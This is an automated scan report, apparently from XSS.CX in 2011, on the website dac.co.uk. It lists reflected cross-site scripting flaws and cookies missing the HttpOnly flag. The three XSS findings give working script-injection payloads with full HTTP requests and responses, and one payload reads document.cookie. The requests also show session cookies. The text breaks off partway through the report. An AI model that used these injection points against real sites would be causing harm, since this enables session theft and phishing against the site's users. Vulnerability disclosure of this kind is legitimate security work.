XSS, DORK, dac.co.uk, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Apr 15 14:09:40 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading


1. Cross-site scripting (reflected)

1.1. http://www.dac.co.uk/about [name of an arbitrarily supplied request parameter]

1.2. http://www.dac.co.uk/contact/london [name of an arbitrarily supplied request parameter]

1.3. http://www.dac.co.uk/publications [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

2.1. http://www.dac.co.uk/about

2.2. http://www.dac.co.uk/contact/dac.css

2.3. http://www.dac.co.uk/contact/dachandheld.css

2.4. http://www.dac.co.uk/contact/dacprint.css

2.5. http://www.dac.co.uk/contact/london

2.6. http://www.dac.co.uk/dac.css

2.7. http://www.dac.co.uk/dachandheld.css

2.8. http://www.dac.co.uk/dacprint.css

2.9. http://www.dac.co.uk/documents/js/jquery.js

2.10. http://www.dac.co.uk/documents/js/main.js

2.11. http://www.dac.co.uk/documents/js/quicklinks.js

2.12. http://www.dac.co.uk/documents/js/sifr-config.js

2.13. http://www.dac.co.uk/documents/js/sifr.js

2.14. http://www.dac.co.uk/documents/js/swfobject.js

2.15. http://www.dac.co.uk/documents/swfs/dac-iris-banner.swf

2.16. http://www.dac.co.uk/file.axd

2.17. http://www.dac.co.uk/gatag.js

2.18. http://www.dac.co.uk/multimedia/maps/offices/bouverie-street.gif

2.19. http://www.dac.co.uk/multimedia/maps/offices/gracechurch-street.gif

2.20. http://www.dac.co.uk/publications

3. Email addresses disclosed

3.1. http://www.dac.co.uk/contact/london

3.2. http://www.dac.co.uk/documents/js/jquery.js

3.3. http://www.dac.co.uk/favicon.ico



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.dac.co.uk/about [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9a6d"><script>alert(1)</script>edcc03b8522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about?c9a6d"><script>alert(1)</script>edcc03b8522=1 HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london?ad1fa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee83f0aa3178=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.3.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9889
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 673bf027b76a4982b43311701122505e
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:33:47 GMT; path=/
Date: Fri, 15 Apr 2011 15:33:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>About us |
...[SNIP]...
<a href="javascript:quickLink('d78835d8620f40f095beed3ca7bc0942|/about?c9a6d"><script>alert(1)</script>edcc03b8522=1')" class="quickLinks" rel="d78835d8620f40f095beed3ca7bc0942|/about?c9a6d">
...[SNIP]...

1.2. http://www.dac.co.uk/contact/london [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /contact/london

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1fa"><script>alert(1)</script>e83f0aa3178 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/london?ad1fa"><script>alert(1)</script>e83f0aa3178=1 HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10194
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 6432dc5b9bb742b7924cb5a05fc15cb1
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:25 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>London Lawy
...[SNIP]...
<a href="javascript:quickLink('1435e7f3523b4a899040ec9985ac7ed4|/contact/london?ad1fa"><script>alert(1)</script>e83f0aa3178=1')" class="quickLinks" rel="1435e7f3523b4a899040ec9985ac7ed4|/contact/london?ad1fa">
...[SNIP]...

1.3. http://www.dac.co.uk/publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff195"><script>alert(1)</script>c5c8b4f28fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications?ff195"><script>alert(1)</script>c5c8b4f28fd=1 HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/about
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.4.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29192
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: fdf36839a0ad483e8172e42cf7105e9d
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:34:49 GMT; path=/
Date: Fri, 15 Apr 2011 15:34:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Publication
...[SNIP]...
<a href="javascript:quickLink('942b19514113475989402821490fc75e|/publications?ff195"><script>alert(1)</script>c5c8b4f28fd=1')" class="quickLinks" rel="942b19514113475989402821490fc75e|/publications?ff195">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 20 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.dac.co.uk/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london?ad1fa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee83f0aa3178=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.3.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9797
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 673bf027b76a4982b43311701122505e
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:33:34 GMT; path=/
Date: Fri, 15 Apr 2011 15:33:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>About us |
...[SNIP]...

2.2. http://www.dac.co.uk/contact/dac.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /contact/dac.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/dac.css HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 39336
Content-Type: text/css; charset=utf-8
Expires: Fri, 15 Apr 2011 15:31:23 GMT
ETag: f70dfa9acd8f4bf980bb136fc792dab6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:13 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:12 GMT

body {
   margin:0px auto;
   padding:0px 30px;
   background-color:#FFFFFF;
   text-align:left;
   font-family:Arial, Helvetica, sans-serif;
   font-size:0.6875em;
   color:#333333;
   line-height:1.36em;
   
...[SNIP]...

2.3. http://www.dac.co.uk/contact/dachandheld.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /contact/dachandheld.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/dachandheld.css HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 62
Content-Type: text/css; charset=utf-8
Expires: Fri, 15 Apr 2011 15:31:24 GMT
ETag: 68ad2a8c3fd74dc781ae322cf01161d4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:14 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:14 GMT

h1, h2, h3, h4, h5, h6 {
font-size:14px;
font-weight:bold;
}

2.4. http://www.dac.co.uk/contact/dacprint.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /contact/dacprint.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/dacprint.css HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/contact/london
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 874
Content-Type: text/css; charset=utf-8
Expires: Fri, 15 Apr 2011 15:31:24 GMT
ETag: dfa8f83b73614f279eafca3e81ebf73d
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:14 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:14 GMT

/* ---------- Hide ---------- */

div.headerinfo,
div.headermain hr,
div.hometop,
div.main hr,
div.navpri,
div.homeleftcol,
div.headermain ul,
div.headerinfo,
div.footermiddle,
div.footerright,
div.pa
...[SNIP]...

2.5. http://www.dac.co.uk/contact/london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /contact/london

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/london HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate; __utmz=229009929.1302880562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229009929.1767327792.1302880562.1302880562.1302880562.1; __utmc=229009929; __utmb=229009929.1.10.1302880562; lang=en-GB

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10102
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
EON-Expires: 60
EON-ResourceIdentifier: 6432dc5b9bb742b7924cb5a05fc15cb1
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:31:12 GMT; path=/
Date: Fri, 15 Apr 2011 15:31:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>London Lawy
...[SNIP]...

2.6. http://www.dac.co.uk/dac.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /dac.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dac.css HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 39336
Content-Type: text/css; charset=utf-8
Expires: Fri, 15 Apr 2011 15:13:10 GMT
ETag: f70dfa9acd8f4bf980bb136fc792dab6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

body {
   margin:0px auto;
   padding:0px 30px;
   background-color:#FFFFFF;
   text-align:left;
   font-family:Arial, Helvetica, sans-serif;
   font-size:0.6875em;
   color:#333333;
   line-height:1.36em;
   
...[SNIP]...

2.7. http://www.dac.co.uk/dachandheld.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /dachandheld.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dachandheld.css HTTP/1.1
Host: www.dac.co.uk
Proxy-Connection: keep-alive
Referer: http://www.dac.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en-GB; ASP.NET_SessionId=iicok2552yrxzp454cqdcu55; quickLinks=b9a956e585814244a6fe5d36302b8d43%7c%2fservices%2fconstruction%2c9d30d0fb17244bf6ac65841b7f6f27c6%7c%2fservices%2fcorporate%2cb00d8e100a8443aa9e14d7c58ddf02d3%7c%2fservices%2fdispute_resolution%2c042c0df04aa84b5aaeddf22fde2a738e%7c%2fservices%2femployment_law%2c390cb63ee5a9495eafb1a73c4b02a11e%7c%2fservices%2finsurance_reinsurance%2c729a9b3c3f4846d8b5e79d26fe67d6ed%7c%2flocations%2flatin_america%2c4088abc766da4f25997b314368429f15%7c%2fservices%2fproduct_liability%2cb760f58f075d426cb5a2fc83365d1a0f%7c%2fservices%2freal_estate

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 62
Content-Type: text/css; charset=utf-8
Expires: Fri, 15 Apr 2011 15:13:10 GMT
ETag: 68ad2a8c3fd74dc781ae322cf01161d4
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-GB; expires=Mon, 25-Apr-2011 15:13:00 GMT; path=/
Date: Fri, 15 Apr 2011 15:13:00 GMT

h1, h2, h3, h4, h5, h6 {
font-size:14px;
font-weight:bold;
}

2.8. http://www.dac.co.uk/dacprint.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dac.co.uk
Path:   /dacprint.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dacprint.css HTTP/1.1
